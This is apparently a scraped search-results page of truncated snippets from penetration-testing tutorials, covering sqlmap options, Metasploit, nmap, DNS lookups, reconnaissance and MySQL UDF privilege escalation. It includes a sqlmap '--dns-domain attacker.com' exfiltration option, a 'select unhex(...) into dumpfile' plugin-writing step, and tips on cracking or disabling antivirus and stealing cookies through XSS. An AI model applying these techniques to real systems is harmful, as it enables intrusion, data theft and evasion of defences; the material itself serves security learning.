burp penetration testing

Discover burp penetration testing, including articles, news, trends, analysis and practical advice about burp penetration testing on alibabacloud.com

Small white diary 45: Kali penetration testing of Web infiltration - sqlmap automatic injection (iii) - sqlmap parameter details - optimization, injection, detection, techniques, fingerprint

Query 1-10 columns, up to 50 columns as --level increases
--union-cols 6-9
--union-char
Union queries use NULL by default, and in extreme cases NULL may be invalidated, at which point the value can be specified manually
--union-char 123 "Web application needs to be analyzed in advance"
--dns-domain
Scenario: An attacker controls a DNS server and uses this feature to increase data extraction rates
--dns-domain attacker.com
--second-order
The result of a page injection, reflected from another page
--second

Penetration Testing Learning using Metasploit

1. Introduction
Metasploit provides a number of friendly, easy-to-use tools for penetration testers. Metasploit was originally created by HD Moore and was later acquired by Rapid7, the maker of the Nexpose vulnerability scanner. During penetration testing, some of the work that can be done by hand can be done by Metasploit. Metasploit needs to be updated frequently and the la

Web penetration testing strategy [2]

SOAPAction header) Testing web services is similar to testing common web applications, but browsers cannot interact with the server. If you have a sample request, you can use a tool or scripting language to fuzz the request and attack the server code.
Web Application Security
Client Security
A common mistake is that programmers perform security checks on the client, such as in JavaScript, to verify whether a mobi

Web Penetration Testing experience skills (full) [reprint]

attempt, of course, you can also brute force hack.
16. Do not neglect XSS, do not neglect cookies; XSS can steal cookies, but also a number of magical, learn to understand; cookies can be forged, cookies can be injected, and cookies can be injected around the vast majority of firewalls.
17. Usually do station more collect path ah, source ah, tools ah, enrich their "weapons" library; it is best to record their invasion steps, or after the reflection, I generally remember in txt, in addition to do ex

Reverse cracking in penetration testing

As more and more companies focus on data security when developing programs, they often encrypt database connections and encrypt some sensitive data in the database to prevent data from being easily stolen! Therefore, we often find some encrypted connection strings during database connection. For those who have no adverse effects, it is possible that will be stopped here! However, we usually cannot meet this requirement, so we need to have some knowledge about reverse encryption and decry

Manual exploit of penetration testing

the Kioptrix Web service, and we need to use instructions to get the returned information. Enter: HEAD / HTTP/1.1, then press Enter twice to see the output:
The output here is the content of the HTTP header. The above information indicates that the target machine ran apache/2.2.8, the system is ubuntu, and the php version is Php/5.2.4-2.
4.2 Using NCAT to get a flag
This process is similar to NC. Refer to the 4.1 content.
4.3 Using smbclient to get a flag
TCP port 139 is a

Penetration Testing of domain name Information Finder Dig tutorial

further process the results.
In addition, dig has some other valuable commands.
List BIND versions
# dig +nocmd txt chaos VERSION.BIND @sn1.example.com +noall +answer
This command determines the BIND version information that is running on the server and is valuable for finding vulnerabilities.
Reverse DNS Lookups
Resolves the IP address to a domain name; besides nslookup, the dig command can also accomplish this task.
# dig +nocmd +noall +answer -x 180.149.132.47

Anti-Virus Software in penetration testing

preceding content as waitalone. Reg, and double-click the import button to exit the trend-free antivirus software.
2. Crack the password of the McAfee antivirus software
The password for unlocking the McAfee antivirus software user interface is saved in the following registry path: HKEY_LOCAL_MACHINE \ SOFTWARE \ Mcafee \ protected topprotection
In fact, the sub-key UIP is the password to be unlocked on the anti-virus software user interface. It is the MD5 ciphertext. You can directly decrypt

Commonly used penetration testing tool-based Web site

written by the other side, you can also use the above tools to identify whether the other side of the thinkphp and other frameworks. The enemy, Baizhanbudai.
FB Netizen H4DE5 Supplement
Well, let me add some of the tools I've used myself:
1. http://www.gpsspg.com/
2. http://websth.com/
3. http://www.showjigenzong.com/
4. http://hd2001562.ourhost.cn/
5. http://www.cz88.net/
6. http://so.baiduyun.me/
7. http://nmap.online-domain-tools.com/
8. http://az0ne.lofter.com/post/31a51a_131960c
This blog also ha

"Security" commonly used penetration testing tool-based Web site

program has previously exposed the vulnerability. If it is written by the other side, you can also use the above tools to identify whether the other side of the thinkphp and other frameworks. The enemy, Baizhanbudai.
FB Netizen H4DE5 Supplement
Well, let me add some of the tools I've used myself:
1. http://www.gpsspg.com/
2. http://websth.com/
3. http://www.showjigenzong.com/
4. http://hd2001562.ourhost.cn/
5. http://www.cz88.net/
6. http://so.baiduyun.me/
7. http://nmap.online-domain-tools.com/
8. http://az

Zoomeye of information collection for penetration testing

name.
Please search the Apache server in the United States: App:apache Country:us
Please search the UK Sendmail server: App:sendmail country:uk
For a complete country code, see: Country code-Wikipedia
IP Address
IP: Searches for a specified IP address.
Google's public DNS server: ip:8.8.8.8
CIDR
The CIDR segment of the IP. Example: CIDR:8.8.8.8/24
4. Web App Search
Component Name
App: the component name.
Ver: Component version.
Apache httpd, version 2.2.16: app: "Apache httpd" ver: "2.2.16"
Operating system

Penetration Test NOTES: Testing an Access database with Sqlmap

error, regardless of it, not a moment to slow down a bit. A bunch of error messages, wait a while, the results come out. Next look at the admin table what, 5 threads too fast, this time 3, continue to explode. There are no known security devices or server performance issues, and 3 threads still have a connection reset. Burst 4 columns with the following: Now, let's see what's in these columns. After a long wait, the data burst. You can see that the password is encrypted, 32-bit, should be MD5 encryption,

MySQL system commands used in penetration testing and UDF rights

and recompile, and use Hex.hta to get the hexadecimal.
mysql> show variables like '%plugin%';
+---------------+-------------------------+
| Variable_name | Value                   |
+---------------+-------------------------+
| plugin_dir    | /usr/lib64/mysql/plugin |
+---------------+-------------------------+
1 row in set (0.00 sec)
mysql> select * from func; # check whether someone has already exported it
mysql> select unhex('Hexcode') into dumpfile '/usr/lib64/mysql/plugin/mysqludf.so';
Query OK, 1 row affected (0.01 sec) # requires /usr/lib64/mysql/plugin/Wr

Penetration testing tools Nmap from beginner to advanced

of other target networks to send packets.
# nmap -sI 192.168.1.6 192.168.1.1
The Idle scan is an ideal anonymous scanning technology that sends data to the host 192.168.1.1 via 192.168.1.6 in the target network to get the open ports of 192.168.1.1. Other scanning techniques are sometimes needed, such as FTP bounce, fragmentation scan and IP protocol scan; those discussed above are several of the most important scanning methods.
Nmap OS Detection (O)
One of the mos

Amazing technology: using php socket5 proxy for Intranet penetration testing

During penetration testing, we often encounter webshells, but webserver provides web services through web port mapping on the Intranet. If you have protection software that causes abnormal server permissions, you cannot create socket proxy and po

Commonly used penetration testing tool-based Web site

In the spirit of good things we share the point of view, to share, I myself in the penetration testing process often used in some sites. If you have good suggestions and additions, you can leave a comment below.
Navisec
Website: http://navisec.it
Network security personnel's Internet navigation, security personnel essential website. Website focused content, and not too much decoration, style is extremely conci

Penetration testing some ideas to share

(1) Collection of website information
First determine the language in which the website is written. Or if there is a mix-up. This can be obtained by viewing the site source files, observing site links, capturing submission requests, and so on.
(2) Crawling Site Directory
Using tools to crawl the site directory, you can assist in the previous step to make the results more

The--nslookup of penetration testing in DNS detection

preinstalled in Kali Linux.
2.1 Default Output
Take the www.baidu.com domain name as an example to run a quick IP address query. Enter the following command on the Kali Linux terminal:
# nslookup www.baidu.com
The output information is as follows:
Server 202.205.16.4 is the DNS server for this network, and UDP port 53 is the port used by DNS requests. The output shows that the Baidu alias is www.a.shifen.com, and the query returned two IP addresses, which indicates that Baidu uses more than one ser

Information collection using Kali Linux in penetration testing

LinkedIn
The user names collected from LinkedIn will be of great use in subsequent tests. For example: social engineering attacks.
Metagoofil
Metagoofil is a tool that uses Google to gather information and currently supports the following types: 1. Word 2. PPT 3. Excel 4. PDF
Commands to use Metagoofil:
# metagoofil
Demonstrate by an example:
# metagoofil -d baidu.com -l 20 -t doc,pdf -n 5 -f Test.html -o test
Through this tool we can see very much information collected, such as user name, path information. We can u

Metasploit penetration testing of Ubuntu 12.04 (1)

This article is mainly about entertaining exercises. Share the Attack Details, including some script files from various sources modified by the original author. The Penetration Process is not the focus. The biggest reason is that the second half of the article is still worth learning about persistence attacks. B
